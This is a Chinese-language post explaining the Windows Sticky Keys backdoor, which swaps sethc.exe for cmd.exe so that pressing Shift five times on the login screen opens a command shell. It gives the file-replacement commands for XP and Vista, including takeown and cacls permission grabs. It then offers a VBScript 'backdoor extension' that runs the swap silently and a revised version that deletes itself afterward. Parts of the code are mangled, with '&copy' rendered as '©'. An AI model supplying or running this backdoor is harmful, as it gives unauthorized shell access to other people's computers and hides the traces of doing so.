什么是粘滯鍵?
    當(dāng)你在Windows操作系統(tǒng)里面連續(xù)按下5次Shift鍵之后，你看看出來(lái)了什么?
    在windows 2000/xp/Vista下，按shift鍵5次，可以打開(kāi)粘置，會(huì)運(yùn)行sethc.exe，而且，在登錄界面里也可以打開(kāi)。這就讓人聯(lián)想到WINDOWS的屏保，將程序替換成cmd.exe后，就可以打開(kāi)shell了。
    一、具體的替換方法：
    XP系統(tǒng)：
    將安裝源光盤(pán)彈出(或?qū)⒂脖P(pán)上的安裝目錄改名)　　 cd %widnir%\system32\dllcache
    ren sethc.exe *.ex~
    cd %widnir%\system32
    copy /y cmd.exe sethc.exe
    Vista系統(tǒng)： takeown /f c:\windows\system32\sethc.exe
    cacls c:\windows\system32\sethc.exe /G administrator:F
    上兩步為獲得權(quán)限的命令，你也可以通過(guò)Vista優(yōu)化大師獲得右鍵菜單的提升權(quán)限的功能，然后在sethc.exe文件上面右鍵直接提升權(quán)限。
    然后按XP方法替換文件
    在登錄界面按5此SHIFT，出來(lái)cmd shell，然后……
    二、后門(mén)擴(kuò)展：　 Dim obj, success
    Set obj = CreateObject("WScript.Shell")
    success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)
    success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)
    success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)
    success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)
    success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)
    success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
    第二句最有意思了，自動(dòng)應(yīng)答....以前就遇到過(guò)類(lèi)似的問(wèn)題
    再更新，加個(gè)自刪除、簡(jiǎn)化代碼：　　 On Error Resume Next
    Dim obj, success
    Set obj = CreateObject("WScript.Shell")
    success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
    CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)